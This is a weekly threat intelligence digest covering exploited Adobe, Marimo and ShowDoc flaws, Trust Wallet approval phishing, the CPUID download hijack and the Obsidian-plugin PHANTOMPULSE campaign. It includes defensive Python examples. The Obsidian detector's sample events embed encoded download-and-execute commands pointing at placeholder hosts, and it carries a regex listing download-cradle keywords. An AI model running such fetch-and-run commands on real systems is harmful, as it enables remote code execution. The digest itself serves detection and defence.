Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Adobe Patches Actively Exploited CVE-2026-34621 in Acrobat and Reader Enabling Arbitrary Code Execution - On 12th April 2026, Adobe patched CVE-2026-34621, an actively exploited vulnerability affecting Adobe Acrobat DC, Acrobat Reader DC, and Acrobat 2024 on Windows and macOS. The flaw impacted versions 26.001.21367 and earlier, as well as 24.001.30356 and earlier. Haifei Li from EXPMON first identified and reported the vulnerability to Adobe on 7th April 2026.
To remediate CVE-2026-34621, Adobe released version 26.001.21411 for Acrobat DC and Acrobat Reader DC, alongside version 24.001.30362 on Windows and version 24.001.30360 on macOS for Acrobat 2024. The vulnerability is a prototype pollution flaw that requires the victim to open a malicious file. Successful exploitation allows threat actors to execute arbitrary code with the same privileges as the logged-in user on the affected system.
Threat Actor Exploits Marimo WebSocket RCE Vulnerability CVE-2026-39987 Within Hours of Disclosure - On 9th April 2026, Sysdig reported active exploitation of a critical pre-authentication remote code execution (RCE) vulnerability tracked as CVE-2026-39987, affecting Marimo WebSocket versions 0.20.4 and earlier. Successful exploitation allows threat actors to obtain a full interactive shell without authentication. Notably, unknown threat actors began exploiting the flaw within approximately 10 hours of public disclosure, despite the absence of a publicly available proof-of-concept.
To mitigate the risk posed by CVE-2026-39987, Insikt Group recommends updating Marimo WebSocket to version 0.23.0.
Threat Actors Actively Exploit Unrestricted File Upload Vulnerability CVE-2025-0520 Affecting ShowDoc - On 12th April 2026, VulnCheck reported that unknown threat actors are actively exploiting an unrestricted file upload vulnerability tracked as CVE-2025-0520, affecting the ShowDoc documentation platform versions prior to 2.8.7. Successful exploitation allows threat actors to upload arbitrary files, potentially compromising the affected system. VulnCheck observed exploitation against a US-based canary (honeypot) instance, where threat actors successfully deployed a webshell.
To mitigate the risk posed by CVE-2025-0520, Insikt Group recommends updating ShowDoc to version 2.8.7 or later.
Potential Threats
Threat Actors Abuse Trust Wallet Deep Links via QR Code Phishing for Unlimited USDT Approval and Wallet Draining - On 14th April 2026, Cyfirma reported that an unidentified threat actor conducted a phishing campaign targeting Trust Wallet users, using QR code phishing distributed via Telegram to obtain unauthorised token approvals and enable fund theft. The campaign uses Trust Wallet deep links to redirect victims to phishing infrastructure mimicking legitimate transaction workflows. Cyfirma identified multiple phishing domains hosted on Netlify, along with Telegram-based delivery mechanisms, and observed characteristics consistent with a scalable operation, including affiliate tracking parameters and real-time monitoring via Telegram bots. The infection chain begins with Telegram channels distributing QR codes embedded in manipulated Trust Wallet screenshots, redirecting users to phishing domains displaying a fake "Send USDT" interface. The site initiates a wallet connection, forces a network switch to BNB Smart Chain, and requests interaction permissions, whilst the phishing script retrieves the wallet balance before loading client-side JavaScript that encodes a transaction targeting the USDT contract.
The client-side payload calls the USDT contract's ERC-20 approve() function to authorise a spender address with the maximum possible allowance, effectively granting unlimited spending permissions. Trust Wallet presents this as a routine approval, and upon user confirmation, the approval is recorded on BNB Smart Chain. The script then sends a success notification and transmits transaction data to a Telegram bot, where at least 52 transactions were observed. The approved spender can subsequently call transferFrom() to move funds from the wallet at any time until the allowance is explicitly revoked by setting it back to zero.
Threat Actor Compromises CPUID Backend API to Serve Malware via Hijacked HWMonitor and CPU-Z Download Links - On 10th April 2026, The Register reported that a threat actor temporarily compromised CPUID's website backend API, replacing legitimate download links for HWMonitor and CPU-Z with links to trojanised installers for approximately six hours between 9th and 10th April 2026. The incident affected the download infrastructure rather than the software build pipeline, with users visiting official product pages redirected to attacker-controlled infrastructure hosted via Cloudflare R2. The trojanised installers were disguised as legitimate software and launched modified Inno Setup packages, in some cases displaying a Russian-language installer interface.
The malware deployed a fake CRYPTBASE.dll, operated largely in memory, and used PowerShell and staged .NET payloads for execution, proxying Windows NTDLL functions through a .NET assembly to evade endpoint detection and response tooling whilst retrieving additional payloads from command-and-control infrastructure. The malware also interacted with Chrome's IElevation COM interface to access or decrypt stored credentials, showing evidence of targeting browser data. The infrastructure overlapped with a March 2026 campaign distributing trojanised FileZilla installers, suggesting continued tooling and infrastructure reuse rather than an isolated incident. CPUID reportedly remediated the compromise and confirmed that legitimate binaries remained properly signed and uncompromised.
Threat Actors Abuse Obsidian Community Plugins to Deliver “PHANTOMPULSE” RAT in “REF6598” Social Engineering Campaign Targeting Crypto and Financial Sectors - On 14th April 2026, Elastic Security Labs reported that threat actors conducted a social engineering campaign dubbed "REF6598" targeting individuals in the cryptocurrency and financial sectors. The attack chain began with threat actors initiating contact via LinkedIn whilst posing as a venture capital firm, before moving conversations to Telegram where multiple controlled personas discussed financial services and cryptocurrency liquidity solutions to simulate a legitimate investment team. Targets were then instructed to access a threat actor-controlled Obsidian cloud vault presented as a business collaboration platform, where they were provided preconfigured account credentials and instructed to enable community plugin synchronisation. This allowed trojanised plugins, including ShellCommands and Hider, to sync locally and execute commands automatically when the vault opened. On Windows systems, the Shell Commands plugin launched Base64-encoded PowerShell, which downloaded a script that retrieved PHANTOMPULL, a loader that decrypted an embedded AES-256-CBC payload, reflectively loaded it into memory, and fetched the PHANTOMPULSE remote access trojan over HTTPS. Elastic detected and blocked the attack chain at an early stage before PHANTOMPULSE could execute, preventing threat actors from completing their objectives.
On macOS systems, the Shell Commands plugin executed a Base64-encoded AppleScript via osascript, establishing persistence via a LaunchAgent configured to run at login and executing an obfuscated second-stage AppleScript dropper. The dropper constructed strings at runtime, contacted hardcoded domains for command-and-control validation, and used a Telegram channel as a fallback mechanism, before sending a POST request to a resolved C2 server and piping the response into osascript for in-memory execution of additional payloads. PHANTOMPULSE itself is a 64-bit Windows RAT supporting command execution, process injection, keylogging, screenshot capture, and system telemetry collection. At the time of reporting, Elastic had not attributed the REF6598 campaign to a specific threat actor.
General News
Big tech fails to opt out users who ask not to be tracked much of the time, new research says - Several large technology firms are placing advertising cookies in users' browsers even when those users have declined to be tracked, potentially putting them at odds with Californian law, according to new research. An audit by privacy organisation webXray, which studied Californian web traffic in March, found that 194 online advertising services ignore legally defined, globally standard opt-out signals endorsed by regulators. The California Consumer Privacy Act grants consumers the right to decline the sale of their personal data, with a mechanism known as Global Privacy Control (GPC) designed to trigger opt-outs for consumers who request them. California has previously penalised companies for ignoring GPC, fining Sephora $1.2 million in 2022 and Disney $2.75 million in February. According to the report, Google allegedly ignored consumers' opt-out requests 86% of the time, with webXray noting that "Google's failure to honour the GPC opt-out signal is easy to find in network traffic." The report includes images purportedly showing how Google's servers respond to opt-out signals with a command to create an advertising cookie. A Google spokesperson disputed the findings, stating the report is based on a "fundamental misunderstanding of how our products work."
Microsoft failed to honour opt-out requests 50% of the time, with its method for responding to opt-out signals said to mirror Google's approach, according to webXray. A Microsoft spokesperson stated that certain cookies are necessary for operational purposes and may therefore be placed even when a GPC signal is detected. Meta's opt-out failure rate was reported at 69%, with webXray alleging that the company's code "contains no check for globally standard opt-out signals." A Meta spokesperson dismissed the research as a "blatant marketing ploy that misrepresents how the Global Privacy Control setting works," arguing that the control restricts how data is shared rather than collected. Timothy Libert, who oversaw cookie privacy policy at Google until 2023, is the chief executive of webXray.
Hackers claim breach of Rockstar Games via cloud analytics platform - The ShinyHunters cybercrime group has claimed responsibility for breaching systems linked to video game developer Rockstar Games, threatening to release stolen data if a ransom is not paid. The group claimed to have accessed Rockstar's cloud-hosted data and warned the information would be leaked if the company failed to respond by 14th April. Rockstar Games confirmed that some company data had been accessed but downplayed the impact, stating that "a limited amount of non-material company information was accessed in connection with a third-party data breach" and that the incident had no impact on its organisation or players. ShinyHunters alleged the breach involved data stored in Rockstar's Snowflake cloud environment, with the intrusion occurring via Anodot, a cloud cost-monitoring and analytics platform. Attackers reportedly obtained authentication tokens from Anodot that allowed access to customer Snowflake accounts without directly breaching Rockstar or Snowflake systems. The incident follows reports of a broader supply-chain compromise involving Anodot that may have exposed sensitive data belonging to multiple Snowflake customers, with ShinyHunters claiming to have discovered authentication tokens granting access to cloud environments used by more than a dozen organisations.
ShinyHunters is a financially motivated cybercrime group active since at least 2020, having previously claimed breaches of major companies across several industries, including Match Group, the operator of dating platforms Tinder, Hinge, and OkCupid. Rockstar Games has previously faced high-profile cyber incidents; in 2022, a hacker leaked internal footage and development materials from the upcoming instalment of the Grand Theft Auto series after breaching the company's systems. Video game developers have increasingly become targets for cybercriminals seeking valuable intellectual property and corporate data, with major studios including Activision Blizzard, Bandai Namco, Capcom, CD Projekt Red, and Riot Games all having experienced cybersecurity incidents in recent years.
‘It reads like a spy novel’: $280 million theft from Drift involved North Korean fake companies - The cryptocurrency platform Drift published its full post-mortem this week describing a months-long operation by North Korean hackers that culminated in the theft of more than $280 million. The operation began six months prior, when Drift officials were approached at a cryptocurrency conference by members of a company claiming to focus on quantitative trading, later linked to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet. The individuals who made contact were technically fluent, had deep knowledge of Drift, and possessed verifiable professional backgrounds, with North Korea allegedly using intermediaries to conduct face-to-face relationship building across multiple industry conferences in multiple countries. Drift officially onboarded the company in December 2025 and January 2026, with the trading firm depositing $1 million of its own capital, and integration conversations continued through early 2026 with further in-person meetings. On 1st April, the $280 million theft was carried out, after which the trading company scrubbed its entire Telegram chat with Drift. The investigation revealed several potential attack vectors, including a contributor possibly being compromised after copying a code repository shared by the trading firm, and another being urged to download a potentially malicious TestFlight application. Drift is working with law enforcement and Mandiant, all platform functions have been frozen, and the attacker's wallets have been flagged across multiple exchanges. Investigators linked the attack to the October 2024 theft of $50 million from crypto firm Radiant Capital based on fund movements and overlapping personas.
Michael Barnhart, who leads nation-state threat intelligence at DTEX, described the incident as intertwined with several Pyongyang-led revenue-generating schemes, noting that two of the three individuals involved appeared to be unwitting participants, whilst one likely intentionally introduced malicious code, evidenced by the deletion of his Telegram accounts after the attack. He compared the operation to the 2017 assassination of Kim Jong-nam, in which two women were unknowingly used to deploy a VX nerve agent, describing the use of cutouts as unprecedented in its sophistication. North Korea has long been linked to AppleJeus operations, attributed to the 2023 supply chain attack on 3CX, a 2022 campaign targeting over 85 users in the cryptocurrency and fintech industries, and a 2024 zero-day attack against the Chromium browser. The FBI has repeatedly warned that North Korea is earning billions through cryptocurrency targeting, with North Korean groups stealing more than $2 billion from crypto firms last year and $3 billion between 2017 and 2023, according to United Nations investigators. Barnhart called the Drift operation "the most sophisticated of all the situations," adding that "it reads like a spy novel."
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
Legend: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

| Threat Actor | Severity (before → after) | Opportunity (before → after) | Intent (before → after) |
|---|---|---|---|
| BlueCharlie | ● Moderate → ● Moderate | ● 53 → ● 55 | ● 25 → ● 25 |
| UAT-10362 | NEW → ● Basic | NEW → ● 30 | NEW → ● 25 |
| TiMc Ransomware Group | NEW → ● Basic | NEW → ● 25 | NEW → ● 5 |
| Krybit Ransomware Group | ● Basic → ● Basic | ● 25 → ● 25 | ● 25 → ● 40 |
| miyako | ● Basic → ● Basic | ● 30 → ● 40 | ● 35 → ● 35 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ Spike: a large increase in reporting volume together with high diversity in the event descriptions.
▲ Rise: a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets |
|---|---|---|---|
| ShinyHunters ▲ | JanelaRAT ▲ | CVE-2026-32201 ▲ | Booking.com ▲ |
| Hanzal ▲ | Adwind ▲ | CVE-2026-34621 ▲ | Take-Two Interactive ▲ |
| Exitium ▲ | JanaWare Ransomware ▲ | CVE-2026-33825 ▲ | Rockstar Games ▲ |
| Russian Hackers ▲ | ProxyShell ▲ | CVE-2025-0520 ▲ | Basic-Fit ▲ |
| UNC1069 ▲ | Backdoor ▲ | CVE-2026-26980 ▲ | Kraken ▲ |
Prominent Information Security Events
Threat Actors Abuse Obsidian Community Plugins to Deliver "PHANTOMPULSE" RAT in "REF6598" Social Engineering Campaign Targeting Crypto and Financial Sectors
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 195[.]3[.]222[.]251
IOC: Hash - 70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980
On 14th April 2026, Elastic Security Labs reported that threat actors conducted a social engineering campaign dubbed "REF6598" targeting individuals in the cryptocurrency and financial sectors. The attack chain began with threat actors initiating contact via LinkedIn whilst posing as a venture capital firm, before moving conversations to Telegram where multiple controlled personas discussed financial services and cryptocurrency liquidity solutions to simulate a legitimate investment team. Targets were then instructed to access a threat actor-controlled Obsidian cloud vault presented as a business collaboration platform, where they were provided preconfigured account credentials and instructed to enable community plugin synchronisation. This action allowed trojanised plugins, including ShellCommands and Hider, to sync locally and execute commands automatically whenever the vault was opened, providing threat actors with a stealthy and persistent foothold within the target environment: the vault, not the endpoint, carries the malicious configuration, so it survives reinstalling the plugin locally and re-executes on every open.
On Windows systems, the Shell Commands plugin launched Base64-encoded PowerShell, which downloaded a script that retrieved PHANTOMPULL, a loader that decrypted an embedded AES-256-CBC payload, reflectively loaded it into memory, and fetched the PHANTOMPULSE remote access trojan over HTTPS from threat actor-controlled infrastructure. On macOS systems, the same plugin instead executed a Base64-encoded AppleScript via osascript, establishing persistence via a LaunchAgent configured to run at login and deploying an obfuscated second-stage AppleScript dropper. The dropper constructed strings at runtime, contacted hardcoded domains for command-and-control validation, and used a Telegram channel as a fallback mechanism, before sending a POST request to a resolved C2 server and piping the response into osascript for in-memory execution of additional payloads. Elastic detected and blocked the attack chain at an early stage before PHANTOMPULSE could execute, preventing threat actors from completing their objectives.
PHANTOMPULSE is a 64-bit Windows remote access trojan supporting command execution, process injection, keylogging, screenshot capture, and system telemetry collection, representing a capable and flexible post-exploitation tool well suited to the financially motivated targeting observed in this campaign. The abuse of Obsidian's community plugin ecosystem is a notable tradecraft development, as it exploits a legitimate, trusted productivity application to achieve code execution whilst bypassing conventional security controls. The use of multiple personas across LinkedIn and Telegram, combined with a convincing business pretext sustained over time, reflects a deliberate and patient approach to target engagement consistent with financially motivated threat actors operating in the cryptocurrency and financial sectors. At the time of reporting, Elastic had not attributed the REF6598 campaign to a specific threat actor.
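The execution pattern above (a note-taking application directly spawning an encoded PowerShell on Windows, or a shell that feeds a Base64 AppleScript into osascript on macOS) is a narrow, high-signal thing to hunt for in process-creation telemetry. The following is an added example written for this digest, not Elastic's rule or code; the process events, hostnames, file paths and URLs in it are constructed placeholders, and the exact command-line shape the plugin used is an assumption. The check is simply "Obsidian is the direct parent of a shell or script interpreter", with any embedded Base64 payload decoded so the analyst sees the download cradle rather than a blob:

```python
"""Flag shell processes spawned by Obsidian, the execution pattern described for REF6598.

Added example, not Elastic's detection logic or code. The process-creation events below are
constructed for illustration (hostnames, paths and URLs are placeholders, not indicators).
"""
import base64
import re
from typing import Optional

# Processes a note-taking app has no business spawning directly.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "osascript", "sh", "bash", "zsh"}
OBSIDIAN_IMAGES = {"obsidian.exe", "obsidian"}

# powershell -EncodedCommand (and its abbreviations) carries Base64 of a UTF-16LE script.
PS_ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Assumed macOS shape: a Base64 blob echoed into base64 -d and piped onward (to osascript).
SH_ENCODED = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|-D|--decode)")
# Keywords indicating a download cradle or a hand-off to another interpreter.
CRADLE = re.compile(
    r"downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|\bcurl\b|osascript",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_embedded(child: str, command_line: str) -> Optional[str]:
    """Recover the script hidden inside an encoded command line, if there is one."""
    try:
        if child in {"powershell.exe", "pwsh.exe"}:
            m = PS_ENCODED.search(command_line)
            return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
        m = SH_ENCODED.search(command_line)
        return base64.b64decode(m.group(1)).decode("utf-8") if m else None
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/text; the raw command line is still reported


def inspect_event(event: dict) -> Optional[dict]:
    """Return a finding when Obsidian is the direct parent of a shell or script interpreter."""
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent not in OBSIDIAN_IMAGES or child not in SHELL_CHILDREN:
        return None
    decoded = decode_embedded(child, event["command_line"])
    return {
        "host": event["host"],
        "child": child,
        "decoded": decoded,
        "download_cradle": bool(CRADLE.search(decoded or event["command_line"])),
    }


def scan(events: list) -> list:
    return [f for f in map(inspect_event, events) if f is not None]


# Constructed sample telemetry (not from the report); the payloads are encoded here so the
# sample stays readable.
_PS = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage1.ps1')"
    .encode("utf-16-le")).decode()
_AS = base64.b64encode(
    b'do shell script "curl -s https://example.invalid/stage2 | osascript"').decode()

SAMPLE_EVENTS = [
    {"host": "win-01", "parent_image": r"C:\Users\a\AppData\Local\Obsidian\Obsidian.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {_PS}"},
    {"host": "mac-01", "parent_image": "/Applications/Obsidian.app/Contents/MacOS/Obsidian",
     "image": "/bin/sh", "command_line": f'sh -c "echo {_AS} | base64 -d | osascript"'},
    {"host": "win-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile"},  # no Obsidian parent: not flagged
    {"host": "mac-02", "parent_image": "/Applications/Obsidian.app/Contents/MacOS/Obsidian",
     "image": "/Applications/Obsidian.app/Contents/MacOS/Obsidian",
     "command_line": "Obsidian --type=renderer"},  # Electron helper child: not flagged
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The parent-child pairing is what makes this usable at scale: PowerShell and osascript are far too common to alert on alone, and Obsidian's own Electron helper children are excluded because they are not shells. Treat the decoded payload as the pivot for the rest of the investigation (the fetched URL, the LaunchAgent on macOS, the vault the plugin synced from), and bear in mind that a legitimate Shell Commands user will trip the same rule, so the finding is a triage item rather than an automatic block.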
Threat Actors Abuse Trust Wallet Deep Links via QR Code Phishing for Unlimited USDT Approval and Wallet Draining
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxps://send-usdt-09-admin[.]netlify[.]app
IOC: URL - hxxps://link[.]trustwallet[.]com/open_url?coin_id=60&url=hxxps://swift-wallat-usdt-send[.]netlify[.]app
On 14th April 2026, Cyfirma reported that an unidentified threat actor conducted a phishing campaign targeting Trust Wallet users, using QR code phishing distributed via Telegram to obtain unauthorised token approvals and enable fund theft. The campaign uses Trust Wallet deep links to redirect victims to phishing infrastructure mimicking legitimate transaction workflows, with multiple phishing domains identified hosted on Netlify alongside Telegram-based delivery mechanisms. The activity demonstrates characteristics consistent with a scalable operation, including the use of affiliate tracking parameters and real-time monitoring via Telegram bots.
The infection chain begins with Telegram channels distributing QR codes embedded in manipulated Trust Wallet screenshots, which redirect users to phishing domains displaying a fake "Send USDT" interface. The site initiates a wallet connection, forces a network switch to BNB Smart Chain, and requests interaction permissions, whilst the phishing script performs read-only calls on the USDT contract to retrieve and display the wallet balance. Client-side JavaScript payload components are then loaded, with the configuration defining the contract and the Telegram bot, and the execution logic encoding a transaction targeting the USDT contract. The campaign's execution is deliberately structured to separate wallet connection approval from transaction submission, establishing access before completing the malicious transaction.
The client-side JavaScript payload calls the USDT contract's ERC-20 approve() function to authorise a spender address with the maximum possible allowance, effectively granting unlimited spending permissions. The Trust Wallet interface presents this as a routine approval, and upon user confirmation, the approval is recorded on BNB Smart Chain. The phishing script then displays a success notification independent of the actual transaction outcome, before transmitting transaction data to a Telegram bot, where at least 52 transactions were observed. Once granted, the approved spender can call transferFrom() to move funds from the victim's wallet at any time, with the allowance remaining active until it is explicitly set back to zero; no further interaction from the victim is needed, so the theft can occur long after the phishing page is gone.
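To make the approve()/transferFrom() mechanics concrete, the following added example (not Cyfirma's analysis code, nor the phishing kit, nor Trust Wallet's code) ABI-encodes and decodes an ERC-20 approve() call, flags the two conditions a wallet or pre-signing review step should warn about (an unlimited allowance and a spender that is not on an allowlist), and builds the approve(spender, 0) call that revokes it. The spender address and the "unlimited" threshold are assumptions; the function selectors are the standard ERC-20 ones and apply unchanged to BEP-20 tokens such as USDT on BNB Smart Chain:

```python
"""Inspect an ERC-20 approve() call before it is signed, and build the matching revocation.

Added example, not Cyfirma's analysis code or the phishing kit. The spender address and the
calldata are constructed for illustration; they are not indicators from the report.
"""

# 4-byte selectors: first four bytes of keccak256 over the canonical signature.
APPROVE = bytes.fromhex("095ea7b3")        # approve(address,uint256)
TRANSFER_FROM = bytes.fromhex("23b872dd")  # transferFrom(address,address,uint256)
UINT256_MAX = 2**256 - 1
# Anything at or above this is treated as "unlimited". The kit uses uint256 max, but a
# drainer only needs an allowance larger than the victim's balance, so the threshold is
# a judgement call (assumed value).
UNLIMITED_THRESHOLD = 10**30


def encode_approve(spender: str, amount: int) -> bytes:
    """ABI-encode approve(spender, amount): selector, left-padded address, big-endian uint256."""
    if not 0 <= amount <= UINT256_MAX:
        raise ValueError("amount out of uint256 range")
    addr = bytes.fromhex(spender.removeprefix("0x"))
    if len(addr) != 20:
        raise ValueError("spender must be a 20-byte address")
    return APPROVE + addr.rjust(32, b"\x00") + amount.to_bytes(32, "big")


def decode_approve(calldata: bytes) -> dict:
    """Parse approve() calldata into spender and amount; reject anything else."""
    if len(calldata) != 68 or calldata[:4] != APPROVE:
        raise ValueError("not a well-formed approve(address,uint256) call")
    spender_word, amount_word = calldata[4:36], calldata[36:68]
    if spender_word[:12] != bytes(12):
        raise ValueError("address word has non-zero padding")
    return {"spender": "0x" + spender_word[12:].hex(),
            "amount": int.from_bytes(amount_word, "big")}


def assess_approval(calldata: bytes, trusted_spenders: set) -> list:
    """Findings a wallet or browser extension should surface before the user confirms."""
    call = decode_approve(calldata)
    findings = []
    if call["spender"].lower() not in {s.lower() for s in trusted_spenders}:
        findings.append("unknown-spender")
    if call["amount"] >= UNLIMITED_THRESHOLD:
        findings.append("unlimited")
    return findings


def revoke_calldata(calldata: bytes) -> bytes:
    """Calldata for approve(spender, 0): the only way to close an allowance once granted."""
    return encode_approve(decode_approve(calldata)["spender"], 0)


if __name__ == "__main__":
    # Constructed placeholder spender; in the campaign this is the kit's collector address.
    drainer = "0x" + "ab" * 20
    tx = encode_approve(drainer, UINT256_MAX)  # what the "Send USDT" page actually submits
    print(decode_approve(tx), assess_approval(tx, trusted_spenders=set()))
    print(revoke_calldata(tx).hex())
```

The tell in this campaign is that a flow advertised as "Send USDT" produces an approve() call rather than a transfer(), and decoding the calldata before signing is what exposes it; the selector check alone distinguishes the two. Revocation is itself an approve() to the same spender with amount 0, has to be sent (and paid for) from the victim's wallet, and does nothing about funds already moved with transferFrom(), which is why checking existing allowances after any suspicious signing prompt matters more than the success banner the page shows.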
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-34621 (Adobe) – This vulnerability can be remediated by updating Acrobat DC and Acrobat Reader DC to version 26.001.21411, alongside version 24.001.30362 on Windows and 24.001.30360 on macOS for Acrobat 2024.
- CVE-2026-39987 (Marimo WebSocket) – This vulnerability can be remediated by updating to version 0.23.0.
- CVE-2025-0520 (ShowDoc) – This vulnerability can be addressed by updating ShowDoc to version 2.8.7.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.